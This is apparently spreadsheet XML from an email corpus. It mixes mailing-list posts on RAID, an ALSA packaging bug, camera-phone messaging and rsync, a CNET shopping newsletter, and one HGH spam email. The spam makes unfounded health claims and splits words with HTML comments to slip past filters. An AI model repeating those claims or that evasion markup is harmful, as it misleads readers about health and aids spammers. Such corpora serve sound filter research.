 &gt; Any idea of the date of this "Hemingway Contest" claim?  Apparently
 &gt; RAID places it c.1995 but I'm just curious as to how many years this
 &gt; may have been out there.
 If memory serves, RAID was in use when I joined Microsoft
 in 1992 and was still in use when I left in 1999.
 - Joe
 -- 
 The Combatant State is your father and your mother, your only
 protector, the totality of your interests. No discipline can
 be stern enough for the man who denies that by word or deed.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Ville wrote :
 &gt; Ok, some more nits: alsa-xmms doesn't work if I don't have
 &gt; alsa-lib-devel installed, but xmms dies on startup telling me:
 &gt; 
 &gt;    Cannot load alsa library: libasound.so: cannot open shared object
 &gt;    file: No such file or directory
 &gt; 
 &gt; libasound.so is part of alsa-lib-devel... if I install it, the ALSA XMMS
 &gt; output plugins works fine.
 OK, will fix :-)
 &gt; I can't install the xine stuff, because xine-libs needs libGLcore.so.1,
 &gt; which I can't find anywhere (NVidia stuff?  I have Radeon 7500...)
 Argh, got bitten again! :-(
 Will fix too...
 Thanks a lot for pointing these out!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</si>
  <si>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yyyy,It's proven - it works
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;body bgColor="#CCCCCC" topmargin=1 onMouseOver="window.status=''; return true" oncontextmenu="return false" ondragstart="return false" onselectstart="return false"&gt;
 &lt;div align="center"&gt;Hello, jm@netmore.net&lt;BR&gt;&lt;BR&gt;&lt;/div&gt;&lt;div align="center"&gt;&lt;/div&gt;&lt;p align="center"&gt;&lt;b&gt;&lt;font face="Arial" size="4"&gt;Human Growth Hormone Therapy&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;b&gt;&lt;font face="Arial" size="4"&gt;Lose weight while building lean muscle mass&lt;br&gt;and reversing the ravages of aging all at once.&lt;/font&gt;&lt;font face="Arial" size="3"&gt;&lt;br&gt;
 &lt;/font&gt;&lt;/b&gt;&lt;font face="Arial" size="3"&gt; &lt;br&gt;Remarkable discoveries about Human Growth Hormones (&lt;b&gt;HGH&lt;/b&gt;) &lt;br&gt;are changing the way we think about aging and weight loss.&lt;/font&gt;&lt;/p&gt;
 &lt;center&gt;&lt;table width="481"&gt;&lt;tr&gt;&lt;td height="2" width="247"&gt;&lt;p align="left"&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif" size="3"&gt;Lose Weight&lt;br&gt;Build Muscle Tone&lt;br&gt;Reverse Aging&lt;br&gt;
 Increased Libido&lt;br&gt;Duration Of Penile Erection&lt;br&gt;&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;&lt;/td&gt;&lt;td height="2" width="222"&gt;&lt;p align="left"&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif" size="3"&gt;Healthier Bones&lt;br&gt;
 Improved Memory&lt;br&gt;Improved skin&lt;br&gt;New Hair Growth&lt;br&gt;Wrinkle Disappearance &lt;/font&gt;&lt;/b&gt;&lt;/p&gt;&lt;/td&gt;&lt;/table&gt;&lt;/center&gt;&lt;p align="center"&gt;&lt;a href="http://211.99.37.206:81/ultimatehgh_run/"&gt;&lt;font face="Arial" size="4"&gt;&lt;b&gt;Visit 
 Our Web Site and Learn The Facts: Click Here&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;/p&gt;&lt;div align="center"&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;BR&gt;You are receiving this email as a subscr&lt;!--yyyy--&gt;iber&lt;br&gt;to the Opt&lt;!----&gt;-In Ameri&lt;!----&gt;ca Mailin&lt;!----&gt;g Lis&lt;!----&gt;t. &lt;br&gt;
 To remo&lt;!--jm--&gt;ve your&lt;!----&gt;self from all related mailli&lt;!--me--&gt;sts,&lt;br&gt;just &lt;a href="http://211.99.37.206:81/ultimatehgh_run/remove.php?userid=jm@netmore.net"&gt;Click Here&lt;/a&gt;&lt;/div&gt;&lt;/body&gt;&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Skateboarder drives-through Subway. With his face
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-5,8296987,1717/
 Date: 2002-09-27T02:45:51+01:00
 (DeKalb Daily Chronicle)
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;
 &lt;head&gt;
 	&lt;title&gt;CNET Shopper Weekly Newsletter&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#EEEEEE" alink="#0000FF" vlink="#0000FF"&gt;
 &lt;center&gt;
 &lt;A href="top"&gt;&lt;/A&gt;&lt;!-- header --&gt;
 	&lt;table cellpadding=0 cellspacing=0 border=0 width=612 bgcolor="#ffffff"&gt;
 	&lt;tr valign=top&gt;
 		&lt;td width=442 colspan=4&gt;
 			&lt;img src="http://www.cnet.com/i/nl/sh/hd_computers.gif" width="442" height="60" border="0" alt="CNET Shopper Weekly Newsletter"&gt;&lt;br&gt;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&lt;img src="http://www.cnet.com/Ads/Media/Images/ad10-dk.gif" width="120" height="10" border="0"&gt;&lt;br&gt;
 						&lt;/td&gt;
 					&lt;/tr&gt;
 				&lt;/table&gt;
 &lt;!-- /advertisement label gif --&gt;
 &lt;!-- insert ad here --&gt;
 &lt;div align="center"&gt;&lt;img src="http://i.i.com.com/cnwk.1d/Ads/common/advertisement.gif" width="120" height="10" border="0"&gt;&lt;/br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=0e--eOTIiQzHxrBSNz4r8dJx98lbK4R" target="new"&gt;   
 &lt;img src="http://ad.doubleclick.net/ad/N296.bsdcnet/B1005052.6;sz=160x600;ord=[timestamp]?" width="160" height="600" border="0"&gt;
 &lt;/a&gt;&lt;/div&gt;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href="http://clickthru.online.com/Click?q=23-sFcGINM8KMnTnOaiAv2Y9ZZvQKrR" &gt;Dell Dimension 8000&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;
 		&lt;td align=right&gt;&lt;FONT face="arial, helvetica" size=-1&gt;2&lt;/td&gt;
 		&lt;td&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;a href="http://clickthru.online.com/Click?q=39-7QgMIjI6kpwFFXfCGLs-y39w-_lR" &gt;Toshiba Sat. 5105-S607&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;
 		&lt;td align=right&gt;&lt;FONT face="arial, helvetica" size=-1&gt;3&lt;/td&gt;
 		&lt;td&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;a href="http://clickthru.online.com/Click?q=4e-0Y95InZASFfui0pIKlsTn8N_Jj9R" &gt;Canon PowerShot G2&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;
 		&lt;td align=right&gt;&lt;FONT face="arial, helvetica" size=-1&gt;4&lt;/td&gt;
 		&lt;td&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;a href="http://clickthru.online.com/Click?q=63-tPKjIHWSgVajy_6g_9-hwkp_WEcR" &gt;Dell Latitude C400&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;
 		&lt;td align=right&gt;&lt;FONT face="arial, helvetica" size=-1&gt;5&lt;/td&gt;
 		&lt;td&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;a href="http://clickthru.online.com/Click?q=78-d5asIdUDup1IEOl5vnMUN5xspoRR" &gt;Nikon Coolpix 995&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 &lt;/table&gt; 
 &lt;table border="0" cellpadding="0" cellspacing="0" width="160"&gt;
 	&lt;tr&gt;
 		&lt;td&gt;&lt;a href="http://clickthru.online.com/Click?q=8d-nbL1Q7notyXHgXmIiSupcptbPMPR" &gt;&lt;img src="http://www.cnet.com/i/fd/yl_arrow.gif" width="13" height="13" border="0" alt=" " align="absbottom" valign="bottom"&gt;&lt;/a&gt;&amp;nbsp;
 		&lt;a href="http://clickthru.online.com/Click?q=a2-6-M7QXZx3gb_YxB9R0CGk_HtsonR" &gt;&lt;b valign="top" class="m1"&gt;&lt;FONT face="arial, helvetica" size=-1&gt;All most popular&lt;/b&gt;&lt;/a&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 &lt;/table&gt;
 &lt;br&gt;
 						&lt;/font&gt;
 					&lt;/FONT&gt;
 &lt;!-- /Most Popular --&gt;
 &lt;BR&gt;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&lt;img src="http://www.cnet.com/i/sh/nl/components_03.gif"&gt;&lt;/td&gt;
 											&lt;/td&gt;
 										&lt;/tr&gt;
 								&lt;/table&gt;
 &lt;!--Prime Feature--&gt;			&lt;table&gt;
 									&lt;TR&gt;
 										&lt;/TD&gt;
 									&lt;/TR&gt;
 									&lt;tr&gt;
 										&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=8&gt;&lt;/td&gt;
 									&lt;/tr&gt;
 									&lt;TR&gt;
 										&lt;TD&gt;&lt;font face="arial, helvetica" size="-1" &gt;
 											&lt;B&gt;Is your PC acting a bit sluggish? &lt;/B&gt;
 &lt;BR&gt;
 Does is sometimes choke on large graphics files or spend 
 more time than ever spinning its hard drive?
 &lt;P&gt;
 Adding more RAM to your system may be the perfect answer to
 your computing woes. With more RAM, you'll be able to get 
 more out of your favorite games, graphics applications, and 
 other resource-intensive applications. 
 &lt;P&gt;
 Unfortunately, figuring out what type of RAM to buy can be both 
 difficult and frustrating. 
 &lt;P&gt;
 Luckily, CNET's all-in-one &lt;a href="http://clickthru.online.com/Click?q=b7-FOgPQ8Jxs5lx1OY0NpbnpTbdL3eR" &gt;&lt;B&gt;Memory Configurator&lt;/b&gt;&lt;/a&gt; makes finding 
 the perfect memory easier than ever! Whatever type of system
 you have, your just a few clicks away from the upgrade you'll 
 need to get your system living up to its full potential.
 &lt;P&gt;
 Check out CNET's new &lt;a href="http://clickthru.online.com/Click?q=cc-h4fQQ0Oq5abQCOU7qeZDozn6f5yR" &gt;&lt;B&gt;Memory Configurator&lt;/b&gt;&lt;/a&gt;
 										&lt;/TD&gt;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1 --&gt;
 							&lt;tr valign="top"&gt;
 								&lt;td width="120"&gt;
 									&lt;a href="http://clickthru.online.com/Click?q=e2-J1OpQhyzY9k7JDDENBEZdihv9KnR" &gt;&lt;img border=0 src="http://shopper.cnet.com/i/co/ps/120/8260093_120_1.gif"&gt;&lt;/a&gt;
 								&lt;/td&gt;
 								&lt;td width=270 colspan="1" valign="center"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=f7-N0QnQLgzfYWF8folrZIGiR6ImOeR" &gt;&lt;B&gt;IBM Deskstar 120GXP &lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; 120GB&lt;BR&gt;
 								&amp;#149; 7200 rpm&lt;BR&gt;
 								&amp;#149; DMA/ATA-100 (Ultra) EIDE&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Lowest Price: &lt;font color="#CC0000"&gt;$136&lt;/font&gt;&lt;/B&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td colspan="2" background="http://www.cnet.com/i/sh/leaf/dots5x7.gif"&gt;&lt;img src="http://www.cnet.com//b.gif" width="409" height="5" alt="" /&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td width="400" colspan="2"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=5&gt;&lt;/td&gt;
 							&lt;/tr&gt;	
 &lt;!-- Product 2 --&gt;
 							&lt;tr valign="top"&gt;
 								&lt;td width="120"&gt;
 									&lt;a href="http://clickthru.online.com/Click?q=0c-_Y3DIc8H37krK6wWDjP2qJ13b4yR" &gt;&lt;img border=0 src="http://shopper.cnet.com/i/co/ps/120/9878039_120_1.gif"&gt;&lt;/a&gt;
 								&lt;/td&gt;
 								&lt;td width=270 colspan="1" valign="center"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=21-UPROIjdDDurOGW7oQqYoj1cTQ4lR" &gt;&lt;B&gt;Lite-On CD-RW&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; 40X/12X/48X EIDE&lt;BR&gt;
 								&amp;#149; 1 year warranty&lt;BR&gt;
 								&amp;#149; SMART Burn&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Starting at: &lt;font color="#CC0000"&gt;$69&lt;/font&gt;&lt;/B&gt;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href="http://clickthru.online.com/Click?q=36-wg7-IiI4fXHQfoXMxvH3QainXQ4R" &gt;&lt;img border=0 src="http://shopper.cnet.com/i/co/ps/120/9816702_120_1.gif"&gt;&lt;/a&gt;
 								&lt;/td&gt;
 								&lt;td width=270 colspan="1" valign="center"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=4b-k_l7IBUPLWw-3dXP9VA35c54JMcR" &gt;&lt;B&gt;Pioneer DVR-A04 DVD-RW EIDE&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; 4.7GB 2X/1X/6X DVD&lt;BR&gt;
 								&amp;#149; 8X/4X/24X CD  &lt;BR&gt;
 								&amp;#149; EIDE/ATAPI DVD-RW/CD-RW&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Lowest Price: &lt;font color="#CC0000"&gt;$289&lt;/font&gt;&lt;/B&gt;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href="http://clickthru.online.com/Click?q=60-oqItIsEAxTU6nSHLN8S_eSgFWVRR" &gt;&lt;img border=0 src="http://shopper.cnet.com/i/co/ps/120/6913998_120_1.gif"&gt;&lt;/a&gt;
 								&lt;/td&gt;
 								&lt;td width=270 colspan="1" valign="center"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=75-whwtIKUAMFv5rjH_rjups7LLZ5ZR" &gt;&lt;B&gt;HP DVD-Writer DVD100i drive&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; Burn your own DVD&lt;BR&gt;
 								&amp;#149; 12x10x32x CD-RW, 2.4x8x DVD&lt;BR&gt;
 								&amp;#149; Internal EIDE &lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Lowest Price: &lt;font color="#CC0000"&gt;$235&lt;/font&gt;&lt;/B&gt;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href="http://clickthru.online.com/Click?q=8a-3y3dQXndGB51noNO3Nt-tKChBwnR" &gt;&lt;img border=0 src="http://shopper.cnet.com/i/co/ps/120/8464348_120_1.gif"&gt;&lt;/a&gt;
 								&lt;/td&gt;
 								&lt;td width=270 colspan="1" valign="center"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=9f-o7XMQ1JdPHuarVNYlcGhVIlcU_eR" &gt;&lt;B&gt;Western Digital Caviar WD1200JB 120GB&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; High Performance&lt;BR&gt;
 								&amp;#149; Ultra ATA/100 Interface &lt;BR&gt;
 								&amp;#149; 7200 RPM, 8MB buffer, OEM&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Lowest Price: &lt;font color="#CC0000"&gt;$169&lt;/font&gt;&lt;/B&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 								&lt;tr&gt;
 								&lt;td colspan="2" background="http://www.cnet.com/i/sh/leaf/dots5x7.gif"&gt;&lt;img src="http://www.cnet.com//b.gif" width="409" height="5" alt="" /&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td width="400" colspan="2"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=5&gt;&lt;/td&gt;
 							&lt;/tr&gt;	
 							&lt;!-- Product 6 --&gt;
 							&lt;tr valign="top"&gt;
 								&lt;td width="120"&gt;
 									&lt;a href="http://clickthru.online.com/Click?q=b5-50FcQ7U79NnWUfl1PHq15ZNEEZPR" &gt;&lt;img border=0 src="http://shopper.cnet.com/i/co/ps/120/3754162_120_1.gif"&gt;&lt;/a&gt;
 								&lt;/td&gt;
 								&lt;td width=270 colspan="1" valign="center"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=ca-iciuQUgF71zrVhhcl8jfOfRHHUnR" &gt;&lt;B&gt;Iomega Predator CD-RW&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; 8x/4x/32x&lt;BR&gt;
 								&amp;#149; External USB &lt;BR&gt;
 								&amp;#149; 650 MB capacity&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Lowest Price: &lt;font color="#CC0000"&gt;$67&lt;/font&gt;&lt;/B&gt;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&lt;p&gt;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ChannelOnline's StoreSite enables you 
 to set up a private storefront with your company name and 
 logo in less than an hour?
 &lt;P&gt;
 Your customers can view quotes you have created for them, 
 search the product database, build their own quotes based
 on the pricing you've predetermined for them, and place 
 orders with you online, 24/7.ross profit available to you on both quotes and 
 orders. 
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=df-1kJhQLEFh2X3WsDfbQq-Kh1XhaeR" &gt;Sign up now&lt;/a&gt; to give your customers a whole new level of 
 service.
  &lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=f4-Y-XEQ0ska-wS1b-uUJ5QddfWmTyR" &gt;Tell me more about ChannelOnline.&lt;/a&gt;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href="http://clickthru.online.com/Click?q=09-joDSIj88OkFei9YLYSS7ZMgtY8lR" &gt;Tech Trends&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=1e-JQuLI4jWh9bj7wnqEsB8LE27qd4R" &gt;Hardware&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=34-pJpSIcd8ldqGrTj3_tvVyn4IcgyR" &gt;Software&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=49-ZM4cIEpSm4U_07NVX4RVXFO5JSFR" &gt;Shopping&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=5e-ssGdIn0656yLdrRhsnStcVTQzc9R" &gt;Downloads&lt;/a&gt;
 					&lt;/ul&gt;&lt;/b&gt;
 				&lt;/font&gt;
 			&lt;/td&gt;
 			&lt;td&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;
 					&lt;ul&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=73-__ZeIBBtE5r_9yOT8UEE0WNrUZcR" &gt;News&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=88-ec5PQQKxb5Hw4hk-rU358atSBbiR" &gt;Investing&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=9d-kkCWQv0uetREessuKLvd75wKZzPR" &gt;Electronics&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=b2-M4pwQX0aTFWwMqAjM2cmpxUCPunR" &gt;Web Building&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=c7-KG43QLPWurneZ4ANWtUoF24wxeeR" &gt;Help &amp; How-Tos&lt;/a&gt;
 					&lt;/ul&gt;&lt;/b&gt;
 				&lt;/font&gt;
 			&lt;/td&gt;
 			&lt;td&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;
 					&lt;ul&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=dc-40zzQ0LrtqW98X1Bz6gEwTinhlyR" &gt;Internet&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=f1-MtTuQpsFWuDJoOUH3XX8owMnerlR" &gt;Games&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=06-fP6uI482xKw93a5map_vCgSyiL4R" &gt;Message Boards&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=1b-wAnhI3N2M0po5rGQ1U5MauO37xrR" &gt;CNET TV &amp; Radio&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=31-V_YRIjMsVaYKCalyLxjkqVAXXblR"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is&amp;nbsp;qqqqqqqqqq-zdnet@spamassassin.taint.org&lt;p&gt;
 &lt;A NOTRACK HREF='http://clickthru.online.com/Click?q=3b-XhvVzBdMK7EMLEu4EuRg8AlPc1GyIsRR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@spamassassin.taint.org&amp;brand=cnet'&gt;Manage My Subscriptions&lt;/a&gt;
 &amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=50-M_CBIR0XgZwRFlVASOnO8CtmMgRR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=65-K82zIDPtIgFj7K6D70VOf0m8P9ZR"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href="http://clickthru.online.com/Click?q=7b-prT_IBZIwRxyfTxbDr4q1O7VpJcR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=90-wHZMQ_IdqhbObekVb8HYULuonXiR" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=a5-DyaHQ7ZTa_WhjGLsIC1b2OB8OEPR" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=ba-m-45QXpKAWA-NkfxhOmI_uIUEknR" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=cf-ebM-QLw2HwvKIThJaylIO7r3fxeR" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=e4-ABYFQVkWGjH79LjI81u0PT_Qv1yR"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136482&amp;NL=e446&amp;ISSUE=2002-07-15" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=fa-FmbN-XO3bOwBB59F5G-GmYUJe9RR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">i agree with rob. i think if the phones (and mms is building traction in europe in handsets), this might be interesting. bottom line is will it a) help sell phones and b) bill enough time on the wcarriers networks?
 anyone remember the polariod photo sticker fad? low quality, small in size. but kids totally dug that stuff. seems like every adolescent girl had that stuff at one point. and it never replaced or aimed to replace digital cameras or normal photographs. i don't think mms photos will be a substitute for other photography - developed at the local 1 hour joint or digital photos on your pc. i think it expands the market and forms a new category. the extent of the category size is the big question (will it be a fad or will it a sustained market). that's consumer behavior and marketing. but i don't think the technology adoption will follow a substitution of another product on the market (in this case, digital photos or normal photos). europe's the one to watch - more teenagers have wireless phones and if the pricing and marketing is right, they'll figure out what to do with it once the carriers how to figure out how to market it to them.
 -h
 &gt;From: "Rob Shavell" &lt;rob@mobiusvc.com&gt;
 &gt;To: "'Mike Masnick'" &lt;mike@techdirt.com&gt;
 &gt;Cc: &lt;fork@example.com&gt;
 &gt;Subject: RE: sprint delivers the next big thing??
 &gt;Date: Wed, 21 Aug 2002 01:10:50 -0700
 &gt;
 &gt;right Mike,
 &gt;
 &gt;i will agree to disagree but i take your comments to heart.  my opinion is
 &gt;only that this is one of the last frontiers of communications ('instant
 &gt;show') that we cross easily (though you are right as rain on pricing).  i am
 &gt;mildly amused at the level of skepticism and innatention it is getting.
 &gt;
 &gt;my premise is that the world will change in dramatic and unexpected ways
 &gt;once there are a billion 'eye's' which can instantly share what they see
 &gt;amongst each other.  that doesn't mean that people will stop talking on
 &gt;their phones, or that people will spend more time w/images than voice.  just
 &gt;that it is fundamental.  from news to crime to privacy to dating to family
 &gt;life to bloopers and practical jokes, i believe there will be an explosion
 &gt;of images unleashed specifically by cell phone integrated lenses because of
 &gt;their utter ubiquity that dwarfs all pictures taken in the history of
 &gt;photography by orders of magnitude and in short order. and yes, changes
 &gt;things 'big time'.
 &gt;
 &gt;rgds,
 &gt;rob
 &gt;
 &gt;
 &gt;-----Original Message-----
 &gt;From: Mike Masnick [mailto:mike@techdirt.com]
 &gt;Sent: Tuesday, August 20, 2002 11:58 PM
 &gt;To: Rob Shavell
 &gt;Cc: fork@example.com
 &gt;Subject: RE: sprint delivers the next big thing??
 &gt;
 &gt;
 &gt;Not to keep harping on this, but...
 &gt;
 &gt;At 11:36 PM 8/20/02 -0700, Rob Shavell wrote:
 &gt;
 &gt;&gt;content: who cares about content?  that no one can think of 'useful'
 &gt;content
 &gt;&gt;is always the business persons mistake. the content is the users
 &gt;&gt;communications.  its anything and everything.  avg person could easily send
 &gt;&gt;half dozen pics to a dozen people a day.  mainly humorous i'd guess. who
 &gt;&gt;cares if content is trivial in nature. picture speaks a thousand words.
 &gt;
 &gt;This does nothing to answer my question.  I *do* care about content.  Hell,
 &gt;if I could be convinced that people would send stupid pics back and forth
 &gt;all day, I'd have a different opinion of this.  I just am not convinced
 &gt;that they will (stupid or not).
 &gt;
 &gt;While a picture may be worth a thousand words (and this is the same
 &gt;argument the guy who works for me made), how many people do you know who
 &gt;communicate by pictures?  Sure, it sounds nice to say that a picture is
 &gt;such an efficient messaging mechanism, but how often do you actually find
 &gt;yourself drawing someone a picture to explain something?
 &gt;
 &gt;I don't buy it.
 &gt;
 &gt;For most messages, text works fine and is the most efficient
 &gt;mechanism.  For some messages, pictures do the job, but I would say not
 &gt;nearly as often as words.  Why do you think Pictionary and Charades and
 &gt;such are games?  Because images are usually not the most efficient way to
 &gt;get a message across.
 &gt;
 &gt;&gt;misc ramblings: i suppose you skeptical forkers would have said the same
 &gt;&gt;thing about '1 hour photo' processing.  trivial, who needs it, i get better
 &gt;&gt;resultion elswhere.  and yet, it had great decentralizing impact - the
 &gt;plant
 &gt;&gt;had to be downsized and pushed to the retail operation - the digital
 &gt;camera,
 &gt;&gt;and finally the integrated digital camera phone brings this cycle of
 &gt;&gt;decentralization in photography to a logical conclusion (which will put the
 &gt;&gt;photo giants to bed) and change the world in a meaningful way.  also, SMS
 &gt;&gt;didn't take off because its easy, it took off because it costs less.  its
 &gt;&gt;greatly ironic the carriers often trumpet the 'profitabilty' of their SMS
 &gt;&gt;traffic over others because of its ratio of cost to bandwidth.  in reality,
 &gt;&gt;SMS cannibilizes the voice rev's they bought their networks to handle.
 &gt;
 &gt;Again, this is the same argument my colleague made (along with "you just
 &gt;don't understand kids today, and they'll run with this").  I wasn't saying
 &gt;that MMS wouldn't take off because it wasn't high quality or that it wasn't
 &gt;easy.  I was saying that I couldn't see why people would use it in a way
 &gt;that "changed the face of communications".
 &gt;
 &gt;I'm looking for the compelling reason (even if it's a stupid one) why
 &gt;people would want to do this.  Sure, if they integrate cameras into the
 &gt;phone, and the quality improves (even only marginally) I can certainly see
 &gt;people taking pictures with their cameras and occasionally sending them to
 &gt;other people.  But, mostly, I don't see what the benefit is to this over
 &gt;sending them to someone's email address, or putting together an online (or
 &gt;offline) photoalbum.
 &gt;
 &gt;I don't think 1 hour photos are trivial.  People want to see their own pics
 &gt;right away, and the quality is plenty good enough for snapshots.  That's
 &gt;one of the main reasons why digital cameras are catching on.  The instant
 &gt;view part.  I'm guessing your argument is that people not only want
 &gt;"instant view", but also "instant show".  Which is what this service
 &gt;offers.  I'm not convinced that most people want "instant show".  I think
 &gt;people like to package their pictures and show them.  That's why people put
 &gt;together fancy albums, and sit there and force you to go through them while
 &gt;they explain every picture.  Sure, occasionally "instant show" is nice, but
 &gt;it's just "nice" on occasion.  I still can't see how it becomes a integral
 &gt;messaging method.
 &gt;
 &gt;What's the specific benefit of taking a picture and immediately sending it
 &gt;from one phone to another?  There has to be *some* benefit, even if it's
 &gt;silly if people are going to flock to it.
 &gt;
 &gt;I'm searching... no one has given me a straight answer yet.
 &gt;
 &gt;The *only* really intriguing idea I've heard about things like MMS lately
 &gt;are Dan Gillmor's assertion that one day in the near future some news event
 &gt;will happen, and a bunch of people will snap pictures with their mobile
 &gt;phones, from all different angles, and those photos tell the real story of
 &gt;what happened - before the press even gets there.
 &gt;
 &gt;Willing to be proven wrong,
 &gt;Mike
 &gt;
 &gt;PS If the wireless carriers continue to price these services as stupidly as
 &gt;they currently are, then MMS is *never* going to catch on.
</t>
  </si>
  <si>
    <t xml:space="preserve">rsync over ssh.. very nice!
 Donncha.
 On Tuesday 13 August 2002 12:22, Niall O Broin wrote:
 &gt; What are the best options available on Linux ? SFTP ? WebDAV ? Something
 &gt; else ? Linux servers - Linux and Mac OS-X clients.
 &gt;
 &gt;
 &gt;
 &gt; Niall
 -- 
 Irish Linux Users' Group: ilug@linux.ie
